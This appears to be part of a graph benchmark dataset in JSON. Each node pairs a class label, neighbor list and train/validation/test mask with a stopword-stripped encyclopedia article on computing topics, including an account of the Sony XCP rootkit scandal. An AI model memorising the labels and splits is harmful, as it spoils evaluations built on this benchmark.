    "text": "Stratus_Technologies:stratus technologies stratus technologies inc. major producer fault tolerant computer servers software company founded 1980 stratus computer inc. natick massachusetts adopted present name 1999 current ceo president dave laurello stratus technologies inc. privately held company owned solely siris capital group parent company stratus technologies bermuda holdings ltd. incorporated bermuda stratus computer marlborough massachusetts based producer fault tolerant minicomputers competed computers tandem computers lesser extent digital equipment corporation vax starting 1983 computers resold worldwide olivetti cps/32 brand 1985 1993 computers resold ibm ibm system/88 brand company based maynard massachusetts stratus shipped first computer february 1982 short 21 months founding customer west lynn creamery located nearby lynn massachusetts initial customer verified stratus strategy competing tandem computers company pioneered general purpose fault tolerant industry west lynn creamery planned purchasing tandem switched stratus learning product company traditional markets financial services companies banks stock exchanges beginning 1990s company moved telecommunications industry particularly area network management custom services result telecommunications revenues surpassed enterprise computing led buyout company ascend communications 1998 later acquired lucent technologies enterprise server portion business little interest ascend portion spun management buyout 1999 funding international investment firm investcorp company named stratus technologies inc. privately held stratus technologies inc. owned siris capital group acquired company april 28 2014 second quarter 2002 lucent sold telecom product lines originally came stratus platinum equity buyout firm based los angeles unit eventually named cemprus llc stratus purchased cemprus 2003 wholly owned subsidiary stratus acquisition gave stratus ss7 signaling software phone networks intelligent gateway software traditional ip voice equipment able communicate software used support higher-level telephony applications calling-card toll free phone number services 2006 stratus purchased emergent network solutions allen texas stratus sold emergent 2009 emergent known stratus telecommunications two companies separate entities one parent july 16 2010 reverse merger ymax vocaltec stratus telecommunications technologies owned vocaltec 2012 stratus acquired assets products services intellectual property marathon technologies along customer base channel-partner network legacy product line originally based motorola mc68000 processors ft xa series migrated intel i860 processors xa/r series hewlett-packard pa-risc processors continuum series finally intel xeon processors v series line runs vos operating system originally many features inspired derived multics operating systems supported legacy platforms xa/r jetta continuum —hp-ux home-grown unix product called ftx fault-tolerant unix —are supported longer actively sold june 2002 stratus introduced ftserver line intel-based servers running microsoft windows 2000 higher stratus ftserver line sold today supports windows 2000 2003 2008 well red hat enterprise linux company sells models ftserver designated entry-level mid-range enterprise-class fault tolerant servers mid-range enterprise ftserver systems also run vmware vsphere virtualization software company began offering stratus avance software june 2008 high availability product virtualization built avance runs two general-purpose x86 servers allows deployment applications across high-availability virtual machines freeing existing x86 servers two servers comprising avance high-availability platform may separated three miles purposes disaster recovery business continuity avance intended serve small-to-medium size businesses need affordable simple high availability virtualization stratus large presence maynard massachusetts u.s. headquarters phoenix arizona well several worldwide offices locations uk netherlands south africa france germany italy spain australia new zealand singapore hong kong china japan company vast customer base popular types customers include banks credit unions emergency response centers 911 usa police departments fire departments hospitals clinics governments credit card companies stock exchanges telcos/phone companies internet providers",
    "neighbors": [
      6529,
      2179,
      7269,
      1606,
      4424,
      5384,
      8233,
      8944,
      6772,
      11604,
      1750,
      8502,
      8729,
      9946,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 7940,
    "label": 9,
    "text": "Basic_block:basic block compiler construction basic block straight-line code sequence branches except entry branches except exit restricted form makes basic block highly amenable analysis compilers usually decompose programs basic blocks first step analysis process basic blocks form vertices nodes control flow graph code basic block circumstances whenever first instruction basic block executed rest instructions necessarily executed exactly order code may source code assembly code sequence instructions formally sequence instructions forms basic block definition general intuitive one ways example allows unconditional jumps labels targeted jumps definition embodies properties make basic blocks easy work constructing algorithm blocks control may transfer reaching end block called block successors blocks control may come entering block called block predecessors start basic block may jumped one location algorithm generating basic blocks listing code simple analyser scans code marking block boundaries instructions may either begin end block either transfer control accept control another point listing simply cut points basic blocks remain note method always generate maximal basic blocks formal definition usually sufficient maximal basic blocks basic blocks extended including adjacent blocks without violating definition basic block input sequence instructions mostly three-address code output list basic blocks three-address statement exactly one block step 1 identify leaders code leaders instructions come following 3 categories step 2 starting leader set following instructions including next leader basic block corresponding starting leader thus every basic block leader instructions end basic block include following instructions begin new basic block include following note control never pass end basic block block boundaries may modified finding basic blocks particular fall-through conditional branches must changed two-way branches function calls throwing exceptions must unconditional jumps added may require adding labels beginning blocks",
    "neighbors": [
      1952,
      6818,
      6821,
      4695,
      7941,
      10796,
      7245,
      3854,
      6478,
      7438,
      10734,
      2262,
      951,
      3960,
      2619,
      2620,
      2045,
      4030
    ],
    "mask": "None"
  },
  {
    "node_id": 7941,
    "label": 9,
    "text": "Binary_translation:binary translation computing binary translation form binary recompilation sequences instructions translated source instruction set target instruction set cases instruction set simulation target instruction set may source instruction set providing testing debugging features instruction trace conditional breakpoints hot spot detection two main types static dynamic binary translation translation done hardware example circuits cpu software e.g run-time engines static recompiler emulators binary translation motivated lack binary target platform lack source code compile target platform otherwise difficulty compiling source target platform statically-recompiled binaries run potentially faster respective emulated binaries emulation overhead removed similar difference performance interpreted compiled programs general translator using static binary translation aims convert code executable file code runs target architecture without run code first done dynamic binary translation difficult correctly since code discovered translator example parts executable may reachable indirect branches whose value known run-time one static binary translator uses universal superoptimizer peephole technology developed sorav bansal alex aiken stanford university perform efficient translation possibly many source target pairs considerably low development costs high performance target binary experiments powerpc-to-x86 translations binaries even outperformed native versions average ran two-thirds native speed honeywell provided program called liberator honeywell 200 series computers could translate programs ibm 1400 series computers programs honeywell 200 series 2014 arm architecture version 1998 video game starcraft generated static recompilation additional reverse engineering original x86 version pandora handheld community capable developing required tools achieving translations successfully several times instance successful x86-to-x64 static recompilation generated procedural terrain generator video game cube world 2014 another example nes-to-x86 statically recompiled version videogame super mario bros. generated usage llvm 2013 2004 scott elliott phillip r. hutchinson nintendo developed tool generate c code game boy binary could compiled new platform linked hardware library use airline entertainment systems 1995 norman ramsey bell communications research mary f. fernandez department computer science princeton university developed new jersey machine-code toolkit basic tools static assembly translation dynamic binary translation looks short sequence code—typically order single basic block—then translates caches resulting sequence code translated discovered possible branch instructions made point already translated saved code memoization dynamic binary translation differs simple emulation eliminating emulator main read-decode-execute loop—a major performance bottleneck paying large overhead translation time overhead hopefully amortized translated code sequences executed multiple times advanced dynamic translators employ dynamic recompilation translated code instrumented find portions executed large number times portions optimized aggressively technique reminiscent jit compiler fact compilers e.g sun hotspot technology viewed dynamic translators virtual instruction set bytecode real one",
    "neighbors": [
      7940,
      5384,
      6153,
      8712,
      8716,
      4112,
      1042,
      5523,
      10516,
      1304,
      8609,
      6818,
      8868,
      9774,
      7983,
      823,
      11447,
      2620,
      10173,
      9665,
      7234,
      1606,
      3142,
      2635,
      7755,
      11596,
      2638,
      3791,
      11604,
      11221,
      4695,
      9309,
      1632,
      11624,
      9707,
      9964,
      9455,
      8944,
      499,
      1399,
      8700,
      3071
    ],
    "mask": "None"
  },
  {
    "node_id": 7942,
    "label": 7,
    "text": "Stanford_DASH:stanford dash stanford dash cache coherent multiprocessor developed late 1980s group led anoop gupta john l. hennessy mark horowitz monica s. lam stanford university based adding pair directory boards designed stanford 16 sgi iris 4d power series machines cabling systems mesh topology using stanford-modified version torus routing chip boards designed stanford implemented directory-based cache coherence protocol allowing stanford dash support distributed shared memory 64 processors stanford dash also notable supporting helping formalize weak memory consistency models including release consistency stanford dash first operational machine include scalable cache coherence influenced subsequent computer science research well commercially available sgi origin 2000 stanford dash included 25th anniversary retrospective selected papers international symposium computer architecture several computer science books simulated university edinburgh used case study contemporary computer science classes",
    "neighbors": [
      2264,
      5464,
      5272,
      3863
    ],
    "mask": "Test"
  },
  {
    "node_id": 7943,
    "label": 5,
    "text": "Line_Mode_Browser:line mode browser line mode browser also known lmb wwwlib www second web browser ever created browser first demonstrated portable several different operating systems operated simple command-line interface could widely used many computers computer terminals throughout internet browser developed starting 1990 supported world wide web consortium w3c example test application libwww library one fundamental concepts world wide web projects cern universal readership 1990 tim berners-lee already written first browser worldwideweb later renamed nexus program worked proprietary software next computers limited use berners-lee team could port worldwideweb application features—including graphical wysiwyg editor— widely deployed x window system since experience programming team recruited nicola pellow math student intern working cern write passive browser basic could run computers time name line mode browser refers fact ensure compatibility earliest computer terminals teletype machines program displayed text images line-by-line text input cursor positioning development started november 1990 browser demonstrated december 1990 development environment used resources priam project french language acronym projet interdivisionnaire d'assistance aux microprocesseurs project standardise microprocessor development across cern short development time produced software simplified dialect c programming language official standard ansi c yet available platforms line mode browser released limited audience vax rs/6000 sun-4 computers march 1991 release first publicly available version integrated cern program library cernlib used mostly high-energy physics-community first beta browser released 8 april 1991 berners-lee announced browser availability august 1991 alt.hypertext newsgroup usenet users could use browser anywhere internet telnet protocol info.cern.ch machine also first web server spreading news world wide web 1991 increased interest project cern laboratories desy germany elsewhere throughout world first stable version 1.1 released january 1992 since version 1.2l released october 1992 browser used common code library later called libwww main developer pellow started working macwww project browsers began share source code may 1993 world wide web newsletter berners-lee announced browser released public domain reduce work new clients 21 march 1995 release version 3.0 cern put full responsibility maintaining line mode browser w3c line mode browser libwww library closely tied together—the last independent release separate browser component 1995 browser became part libwww agora world wide web email browser based line mode browser line mode browser popular beginning web since web browser available operating systems statistics january 1994 show mosaic quickly changed web browser landscape 2 world wide web users browsed line mode browser new niche text-only web browser filled lynx made line mode browser largely irrelevant browser one reason lynx much flexible line mode browser became test application libwww simplicity line mode browser several limitations line mode browser designed work operating system using called dumb terminals user interface simple possible user began command-line interface specifying uniform resource locator url requested web page printed line line screen like teleprinter websites displayed using first versions html formatting achieved capitalization indentation new lines header elements capitalized centered separated normal text empty lines navigation controlled pointing device mouse arrow keys text commands typed program numbers brackets displayed link links opened typing corresponding number program led one journalist time write web way finding information typing numbers page scrolled empty command carriage return entered scrolled command codice_1 command codice_2 navigated backwards history new pages navigated codice_3 go url browser authoring functions pages could read edited considered unfortunate robert cailliau one developers think retrospect biggest mistake made whole project public release line-mode browser gave internet hackers immediate access point view passive browser — editing capabilities line mode browser designed able platform independent official ports apollo/domain ibm rs6000 decstation/ultrix vax/vms vax/ultrix ms-dos unix windows classic mac os linux mvs vm/cms freebsd solaris macos browser supports many protocols like file transfer protocol ftp gopher hypertext transfer protocol http network news transfer protocol nntp wide area information server wais features included rlogin telnet hyperlinks cyrillic support added 25 november 1994 version 2.15 ability set proxy client browser could run background process download files line mode browser problems recognizing character entities properly collapsing whitespace supporting tables frames",
    "neighbors": [
      513,
      6657,
      9736,
      2579,
      7188,
      6171,
      9757,
      7713,
      3110,
      10791,
      9770,
      559,
      7217,
      4661,
      3639,
      10808,
      3643,
      9275,
      64,
      576,
      5707,
      10834,
      6231,
      8281,
      6747,
      1642,
      9834,
      9841,
      115,
      9843,
      4213,
      4725,
      6775,
      3191,
      4728,
      119,
      124,
      637,
      7806,
      1664,
      2182,
      6797,
      3218,
      10910,
      8351,
      4768,
      7340,
      9394,
      9908,
      185,
      11449,
      4797,
      7364,
      11466,
      7885,
      11469,
      9424,
      4310,
      2777,
      8923,
      737,
      4326,
      4331,
      4844,
      2804,
      10486,
      2296,
      8443,
      9987,
      1807,
      5907,
      278,
      3350,
      7965,
      7455,
      1834,
      7983,
      823,
      8504,
      10057,
      11082,
      10060,
      2893,
      2895,
      11604,
      11112,
      8557,
      10611,
      5492,
      3961,
      6528,
      11650,
      3971,
      3462,
      8070,
      8584,
      6028,
      7053,
      7572,
      5026,
      944,
      5054,
      10174,
      6086,
      9166,
      4048,
      5078,
      479,
      10722,
      5605,
      6629,
      487,
      8169,
      5612,
      494,
      1520,
      7152,
      6133,
      502,
      5622,
      5114,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7944,
    "label": 8,
    "text": "Orion_Application_Server:orion application server orion application server java ee application server developed swedish company ironflare ab founded magnus stenman karl avedal first released 1999 orion claims first commercially available application server full java ee support current stable version 2.0.7 compliant java ee version 1.3 oracle corporation acquired license source orion 2001 developed oracle application server containers java ee oc4j oc4j documentation contains reference orion server orion developers involved maintenance enhancements source oracle ironflare became official java ee licensee 2003 enabled access sun microsystems compatibility testing tools ensure correct implementation java ee specification orion orion product ironflare hence orion marketed company",
    "neighbors": [
      4233,
      9665
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7945,
    "label": 9,
    "text": "OxMetrics:oxmetrics oxmetrics econometric software including ox programming language econometrics statistics developed jurgen doornik david hendry oxmetrics originates pcgive one first econometric software personal computers initiated david hendry 1980s london school economics oxmetrics builds ox programming language jurgen doornik developed university oxford describes history econometric software packages oxmetrics family software packages econometric financial analysis time series forecasting econometric model selection statistical analysis cross-sectional data panel data main modules apart pcgive dynamic econometric models ardl var garch switching autometrics panel data models dpd limited dependent models stamp structural time series modelling ssfpack state space methods g rch financial volatility modelling present many empirical examples pcgive oxmetrics econometrics textbook give modern examples time series analysis textbook",
    "neighbors": [
      5129,
      3980,
      2317,
      6797,
      7950,
      2457,
      7580,
      7326,
      7983,
      6962,
      823,
      6718,
      5830,
      5703,
      4808,
      5833,
      5450,
      8262,
      2000,
      9944,
      2652,
      10848,
      4840,
      10472,
      363,
      5612,
      7924
    ],
    "mask": "None"
  },
  {
    "node_id": 7946,
    "label": 1,
    "text": "SolidDB:soliddb soliddb in-memory relational database management system developed sold unicom global soliddb delivers extreme speed persistent relational in-memory database meets performance reliability demands real-time applications unicom global known unicom government inc. american information technology hardware solutions company founded 1983 provide microcomputer software federal government united states 1986 worked local state federal government agencies 1996 registered url engaged e-commerce soliddb includes in-memory database well traditional disk based database employ sql interface high availability option in-memory disk based engines coexist inside server process single sql statement access data engines high availability option maintains two copies data synchronized times case system failure applications recover access soliddb less second without loss data soliddb easy deploy administer ability embedded directly applications run virtually unattended lower total cost-of-ownership historically used embedded database telecommunications equipment network software similar systems companies using soliddb include alcatel-lucent ericsson cisco systems emc corporation hewlett-packard nokia siemens ag nokia networks solid acquired ibm late 2007 privately held company founded helsinki finland 1992 solid sold unicom global 2014",
    "neighbors": [
      5384,
      10921,
      4781,
      10286,
      10413,
      6834,
      3219,
      2901,
      10389
    ],
    "mask": "Test"
  },
  {
    "node_id": 7947,
    "label": 2,
    "text": "Zero_Install:zero install zero install means distributing packaging software multiple operating systems linux unix-like macos windows rather normal method downloading software package extracting installing used accompanying use destructive updates privilege escalation packages distributed using zero install need run first time software accessed downloaded internet cached subsequently software accessed cache inside cache application unpacks directory application directory systems system intended used alongside distribution native package manager two advantages zero install popular packaging systems cross-platform root password needed install software packages installed system locations writable user instead requiring administrator access thus package installation affects user installing makes possible users able install run new software among disadvantages 0install fact applications often need rewrite packager e.g absolute paths may use among requirements quality 0install repo content varies may contain unmaintained software",
    "neighbors": [
      11525,
      2310,
      10760,
      2955,
      7435,
      7181,
      910,
      9487,
      2448,
      8466,
      788,
      1813,
      8213,
      10900,
      6680,
      8476,
      5670,
      4775,
      7847,
      6828,
      6446,
      7983,
      1842,
      823,
      2872,
      6583,
      3131,
      700,
      5819,
      190,
      10172,
      3649,
      10817,
      9671,
      5067,
      3918,
      463,
      3667,
      6227,
      4951,
      6361,
      2010,
      9564,
      2401,
      1379,
      7140,
      741,
      231,
      5096,
      6119,
      9063,
      5612,
      9324,
      7920,
      6257,
      1138,
      1522,
      5492,
      10096,
      6393,
      7293,
      9726
    ],
    "mask": "Test"
  },
  {
    "node_id": 7948,
    "label": 4,
    "text": "Multiscanning:multiscanning multiscanning running multiple anti-malware antivirus engines concurrently traditionally single engine actively scan system given time using multiple engines simultaneously result conflicts lead system freezes application failures however number security applications application suites optimized multiple engines work together testing agencies published results showing single antivirus engine 100 effective every malware threat engine uses different scanning methodologies updates malware definition files various frequencies using multiple engines increases likelihood catching malware affect system network",
    "neighbors": [
      9537,
      7362,
      2213,
      1318,
      11019,
      3885,
      6382,
      8493,
      4464,
      3955,
      2005,
      10166,
      3739,
      156
    ],
    "mask": "Train"
  },
  {
    "node_id": 7949,
    "label": 4,
    "text": "Abuse_Reporting_Format:abuse reporting format abuse reporting format arf standard format reporting spam via email draft describing standard format feedback loop fbl reports posted yakov shafranovich april 2005 evolved current aol pioneered field 2003 initially used different format converted de facto standard 2008 feedback loops n't use arf january 2010 ietf chartered new working group working towards goal standardizing arf format wg called messaging abuse reporting format wg marf produced rfc 5965 2012 extended rfc 6591 rfc 6692 define failure reports reporting email authentication failures 2015 latter report type extended rfc 7489 define dmarc forensic reports arf format designed extensible providing generic spam reporting e.g users anti-spam center help desk opt-out operations format defines new mime type included codice_1 attachment includes least headers offending message although draft description acknowledges operators may choose modify redact portion privacy legal reasons recommends entire original email message attached including unmodified recipient address arf-encapsulated fbl report comes subject offending message much like bounce messages abuse report consists human readable part followed machine readable part original message machine readable part type codice_2 whose definition core draft extensibility achieved including feedback-type field characterizes report possible values field iana registry provided feedback-type well field names field name may either relevant type feedback specified type fields may appear multiple times example source-ip field containing ip address original message received may appear type fbl report removal-recipient field indicating email addresses removed may appear opt-out reports one times addition dkim-failure subtype iana registry example report email abuse follows note first three lines machine readable part required",
    "neighbors": [
      8224,
      8130,
      1667,
      8133,
      488,
      3145,
      6762,
      1899,
      8202,
      8747,
      914,
      5012,
      6261,
      1495,
      8093
    ],
    "mask": "Test"
  },
  {
    "node_id": 7950,
    "label": 9,
    "text": "XploRe:xplore xplore commercial statistics software package developed german software company md*tech around prof. dr. wolfgang härdle xplore discontinued 2008 last version 4.8 available download cost user interacted software via xplore programming language derived c programming language individual xplore programs called quantlets besides standard functions one- multidimensional data analysis focus non- semiparametric modelling statistics financial markets xplore quantlet client users able run xplore java applet web browser applet sent user commands via tcp/ip based communication protocol xplore quantlet server computed necessary results sent back client technology also used enrich electronic books interactive examples",
    "neighbors": [
      5129,
      7945,
      3980,
      2317,
      6797,
      2457,
      7580,
      7326,
      6962,
      6718,
      5830,
      5703,
      4808,
      5833,
      5450,
      8262,
      2000,
      9944,
      2652,
      10848,
      4840,
      363,
      5612,
      7924,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7951,
    "label": 8,
    "text": "Goanna_(software):goanna software goanna open-source browser engine fork mozilla gecko used pale moon browser basilisk browser uxp-based applications fork k-meleon browser also uses goanna independent fork gecko first released january 2016 project founder lead developer m. c. straver technical legal motives context pale moon increasing divergence firefox two significant aspects goanna divergence rust language components added gecko mozilla quantum project applications use goanna always run single-process mode whereas firefox became multi-process application core web standards supported goanna",
    "neighbors": [
      1664,
      6791,
      9736,
      1295,
      2836,
      10006,
      11418,
      9757,
      1713,
      7346,
      7861,
      11449,
      5054,
      7543,
      9152,
      9281,
      4423,
      10057,
      2893,
      3407,
      4048,
      7889,
      5078,
      6231,
      11223,
      8923,
      10078,
      482,
      10722,
      487,
      8169,
      10860,
      6133,
      119,
      4728,
      5114,
      8443,
      637,
      6143
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7952,
    "label": 1,
    "text": "BioSearch:biosearch biosearch web application developed manage marine biodiversity data indian waters recent demand indian marine biodiversity information increased manifolds owing mainly realization marine biodiversity potential biotechnology pollution control energy generation however recently web based open access database could provide comprehensive information indian coastal biodiversity lacking biosearch created address need biosearch enables access anyone anywhere time biosearch search page user search information organism name location presence recorded ecology economic importance user obtain information organism names image description ecology economic importance also referred literature biosearch web-based application user-end requirements minimal basic requirement includes computer system internet connection web browser biosearch designed enable easy access organism pages lowest internet connection speeds particularly important parts country rely dial–up 56kbit/s internet connections various applications biosearch anticipated biosearch basic level used fishermen information fish catch general public learn marine biodiversity browsing name indices students lecturers use description lifecycle reproduction taxonomic literature information project work activities conservationist obtain organism distribution diversity particular area iucn red list status organism biotechnologist use biosearch know distribution biotechnologically important organism may help future specimen collection advance applications anticipated fields pisciculture remote sensing geographical information systems gis ecological modeling",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 7953,
    "label": 7,
    "text": "Imonggo:imonggo imonggo free cloud-based pos small businesses released international tech company movmento pte ltd. 2009 first free web-based pos system available small business imonggo used macos configured safari also supports major internet browsers internet explorer firefox google chrome imonggo version 2.0 first launched 2009 movmento pte ltd.. movmento saas company headquarters singapore sales marketing divisions united states research development teams located philippines imonggo released ipad app january 4 2013 app allows users sell items offline use ipad tablets showcase products customers imonggo downloadable software users must create account online accessed anywhere internet connection imonggo configured pos system well web-based retail management solution allows retailers manage hundreds stores inventory well providing sales analysis business intelligence imonggo allows stores create multiple users well business subsidiaries software also hack-proof ssl encryption protect data also uses several servers different geographical areas back data order ensure business data company lost destroyed software also support peripherals barcode scanners label printers cash drawers check readers receipt printers signature capture pads imonggo partnered authorize.net credit card processing also software partner star micronics co. ltd. imonggo awarded best business software award point sales software category apex 2009 2011 also listed one top 90 cloud computing companies watch",
    "neighbors": [
      467,
      5078,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 7954,
    "label": 3,
    "text": "SPIM:spim spim mips processor simulator designed run assembly language code architecture program simulates r2000 r3000 processors written james r. larus professor university wisconsin–madison mips machine language often taught college-level assembly courses especially using textbook computer organization design hardware/software interface david a. patterson john l. hennessy name simulator reversal letters mips spim simulators available windows pcspim mac os x unix/linux-based xspim operating systems release 8.0 january 2010 simulator licensed standard bsd license january 2011 major release version 9.0 features qtspim new user interface built cross-platform qt ui framework runs windows gnu/linux mac os x version project also moved sourceforge better maintenance precompiled versions qtspim linux 32-bit windows mac os x well pcspim windows provided spim simulator comes rudimentary operating system allows programmer usage common used functions comfortable way functions invoked syscall-instruction os acts depending values specific registers spim os expects label named main handover point os-preamble mars mips assembler runtime simulator java-based ide mips assembly programming language alternative spim initial release 2005 active development imperas suite embedded software development tools mips architecture uses just-in-time compilation emulation simulation technology simulator initially released 2008 active development 30 open source models mips 32 bit 64 bit cores",
    "neighbors": [
      477,
      8609,
      7234,
      6250,
      5612,
      6797,
      783,
      7983,
      5873,
      5492,
      823,
      3421
    ],
    "mask": "None"
  },
  {
    "node_id": 7955,
    "label": 4,
    "text": "Norton_Security:norton security norton security developed symantec corporation cross-platform security suite provides subscription-based real-time malware prevention removal addition identity theft protection performance tuning tools features include personal firewall email spam filtering phishing protection released september 23 2014 part symantec streamlined norton line replaces long-running norton internet security flagship antivirus product effort streamline large confusing norton product line symantec combined nine standalone norton products one all-purpose suite norton security supersedes norton internet security norton 360 overlapping release cycle saw version 22 initial release former final release latter however version 22 norton 360 norton internet security updates opposed full releases terms similarities differences predecessors norton security retains components norton internet security including antivirus firewall identity theft components adds optimization tools norton 360 norton security available three editions norton security standard one license valid single device norton security deluxe five licenses norton security premium offers ten licenses 25 gb hosted online backup premium subscription symantec parental control system editions include protection windows os x android ios devices however features may vary based operating system",
    "neighbors": [
      5512,
      6797,
      10903,
      6297,
      5924,
      6565,
      1708,
      7983,
      8368,
      8753,
      2870,
      11065,
      3520,
      2378,
      8398,
      7515,
      9569,
      3941,
      4464,
      6643,
      10872,
      8572,
      9983
    ],
    "mask": "Test"
  },
  {
    "node_id": 7956,
    "label": 0,
    "text": "Robby_Garner:robby garner robby garner born 1963 american natural language programmer software developer 1998 1999 loebner prize contests program called albert one listed 2001 guinness book world records written human computer program native cedartown georgia robby attended cedartown high school worked father television repair shop began programming family business age 15 commander afjrotc squadron junior high school attending joint-enrollment college classes local community college forming software company called robitron software research inc. 1987 father robert j. garner sister pam worked software developer 1997 father retired company disbanded one first web chatterbots named max headcold written garner 1995 max served two purposes collect data web chat behavior entertain customers fringeware online bookstore program eventually implemented java package called jfred written paco nathan based c++ fred cgi program influences stanford various corporations garner nathan took part world largest online turing test 1998 jfred program perceived human 17 participants computational behaviorist term coined dr. thomas whalen 1995 garner first attempts simulating conversation involved collections internet chat viewed sequence stimuli responses kevin copple ellaz systems collaborated garner several projects including copple ella garner contributed voice recordings music garner copple believe intelligence may built one facet time rather depending general purpose theory emerge competing six loebner prize contests used competition way test prototypes judges year winning contest twice 1998 1999 program called albert one began collaborating software developers variety conversational systems garner created robitron yahoo group 2002 forum virtual watering hole loebner prize contest participants discussion related topics multifaceted approach presented colloquium conversational systems november 2005 involves multiple chat bots working control master control program using technique strengths various web agents may united control java applet servlet control program categorizes stimuli delegates responses programs hierarchy spin-off technique turing hub automated turing test featuring four top loebner prize contest competitors",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 7957,
    "label": 4,
    "text": "Extended_Copy_Protection:extended copy protection extended copy protection xcp software package developed british company first 4 internet 20 november 2006 changed name fortium technologies ltd sold copy protection digital rights management drm scheme compact discs used cds distributed sony bmg sparked 2005 sony bmg cd copy protection scandal context also known sony rootkit security researchers beginning mark russinovich october 2005 described program functionally identical rootkit computer program used computer intruders conceal unauthorised activities computer system russinovich broke story sysinternals blog gained attention media researchers ultimately led civil lawsuit criminal investigations forced sony discontinue use system sony eventually recalled cds contained xcp system web-based uninstaller investigated noted security researchers ed felten alex halderman stated activex component used removing software exposed users far significant security risks including arbitrary code execution websites internet version software used sony cds one marketed xcp-aurora first time user attempts play cd windows system user presented eula refuse accept cd ejected accept software installed eula mention installed hidden software software remain resident user system intercepting accesses cd drive prevent media player ripper software one included xcp-aurora accessing music tracks sony cd obvious way uninstall program provided attempting remove software deleting associated files manually render cd drive inoperable due registry settings program altered however soon discovered software could easily defeated merely using permanent marker draw dark border along edge disk following mark russinovich publication findings security researchers quick publish analyses many findings highly critical sony first 4 internet specifically software found conceal activity manner rootkit expose users follow-on harm viruses trojans xcp cloaking technique makes processes names starting codice_1 invisible used malware piggybacking ensure hidden user view first malicious trojan hide via xcp discovered 10 november 2005 according report bitdefender antivirus company follow-up research felten halderman showed web-based uninstaller sony later offered software contains critical security problems software installs activex component allows web site run software user computer without restriction component used first 4 internet web site download run uninstaller remains active afterward allowing web site user visits take computer since specific microsoft windows xcp effect operating systems linux bsd os/2 solaris os x meaning users systems suffer potential harm software also impeded ripping copying normal music tracks cd discs involved sony scandal contained competing technology mediamax sunncomm attempts install kernel extension mac os x however due permissions mac os x widespread infections among mac users although russinovich first publish rootkit researchers discovered around time either still analyzing chose disclose anything sooner due chilling effect anti-circumvention clause digital millennium copyright act shortly independent researchers broke story security software vendors followed releasing detailed descriptions components xcp well software remove codice_2 cloaking component hand software yet released remove cd-rom filter driver component computer associates makers pestpatrol anti-spyware software characterize xcp software trojan horse rootkit xcp.sony.rootkit installs drm executable windows service misleadingly names service plug play device manager employing technique commonly used malware authors fool everyday users believing part windows approximately every 1.5 seconds service queries primary executables associated processes running machine resulting nearly continuous read attempts hard drive shown shorten drive lifespan furthermore xcp.sony.rootkit installs device driver specifically cd-rom filter driver intercepts calls cd-rom drive process included music player player.exe attempts read audio section cd filter driver inserts seemingly random noise returned data thus making music unlistenable xcp.sony.rootkit loads system filter driver intercepts calls process directory registry listings even unrelated sony bmg application rootkit driver modifies information visible operating system order cloak sony bmg software commonly referred rootkit technology furthermore rootkit affect xcp.sony.rootkit files rootkit hides every file process registry key beginning codice_1 represents vulnerability already exploited hide world warcraft ring0 hacks time writing could potentially hide attacker files processes access infected system gained computer associates announced november 2005 anti-spyware product pestpatrol would able remove sony software one month later microsoft released update windows malicious software removal tool could clean f4irootkit malware somewhat slow incomplete response antivirus companies however questioned bruce schneier information security expert author security articles texts including secrets lies article wired news mr. schneier asks happens creators malware collude companies hire protect us malware answer users lose ... dangerous damaging rootkit gets introduced wild half million computers get infected anyone anything beginning early august 2005 windows users reported crashes related program called aries.sys inexplicably unable find file computers file known part xcp call help host leo laporte said experienced rise reports missing cd-rom drives symptom unsuccessful attempts remove xcp security researcher dan kaminsky used dns cache analysis determine 568,000 networks worldwide may contain least one xcp-infected computer kaminsky technique uses fact dns nameservers cache recently fetched results xcp phones home specific hostname finding dns servers carry hostname cache kaminsky able approximate number networks affected release data kaminsky learned as-yet undetermined number enhanced cds without rootkit also phone home address rootkit-affected discs use infection rates still active investigation according analyst firm gartner xcp suffers flaw implementing drm drm technology current future tries apply drm audio cds designed played stand-alone cd players according gartner installation xcp drm software relies cd multi-session application ink via ordinary felt-tip marker outer edge disk renders data track cd unreadable thereby causing pc treat disc ordinary single-session music cd slysoft anydvd program removes copy protections standard hi-definition video discs also defeats drm audio cds active audio cd inserted anydvd blocks pc accessing session audio rendering data sessions unreadable preventing installation malware xcp much speculation extent actions taken software violation various laws unauthorized tampering computers laws regarding invasion privacy spyware subject sony first 4 internet legal liability states california new york texas well italy already taken legal action companies class action lawsuits likely however mere act attempting view remove software order determine prevent alteration windows would theoretically constitute civil criminal offense certain anti-circumvention legislation controversial digital millennium copyright act united states electronic frontier foundation fred von lohmann also heavily criticised xcp eula calling legalese rootkit one primary reasons xcp experiment lies issue adding drm legacy standard problems explored professor randal picker professor law university chicago school law article mistrust-based digital rights management published volume 5 journal telecommunications high technology law cds incapable updating legacy hardware stand-alone cd players lack ability change upgrade firmware order read drm thus drm must added interfere function legacy players yet still work cd placed computer professor picker analyzes four main issues add-on drm first problem demonstrated xcp example capable consumers simply by-pass drm turning autorun prevented rootkit installation thus invalidated drm scheme second problem consumer reaction adding drm legacy product like music cds traditionally rights management scheme infuriate consumers professor picker points wake negative publicity surrounding sony add-on drm amazon.com began alerting customers sony cds contained xcp customers could avoid drm entirely negating effectiveness third problem lies legal response eff well state attorneys general investigated brought suit sony xcp program professor picker analyze legal merits suits cost litigation potentially outweighs benefit attempting add-on drm fourth final problem lies end user license agreement attempted enforced add-on drm ability actually enforce agreements add-on drm limited mere fact without active registration tracking cds company one enforce therefore expected benefit enforcing eula violators actually non-existent costs however implementing add-on drm scheme form state federal investigations private lawsuits negative publicity consumer backlash technical limitations far outweighs benefits researcher sebastian porst matti nikki number software experts published evidence xcp software infringes copyright lame mp3 encoder mpglib faac id3lib id3 tag reading writing mpg123 vlc media player princeton researcher alex halderman discovered nearly every xcp cd code uses modified version jon johansen drms software allows open apple computer fairplay drm included found code inactive fully functional could use insert songs fairplay drms mpg123 vlc licensed gnu general public license gpl software found like lame licensed terms gnu lesser general public license lgpl also free software claims correct sony/bmg distributing copyrighted material illegally jon johansen wrote blog talking lawyer thinks sue however opinions advice given wrong lame developers put open letter sony/bmg online copyright violations sony could accused include sony already provides version id3lib source code web site unrelated xcp national public radio program thomas hesse president sony bmg global digital business division asked people think n't even know rootkit care explained software designed protect cds unauthorized copying ripping sony also contends component malicious compromise security alleviate 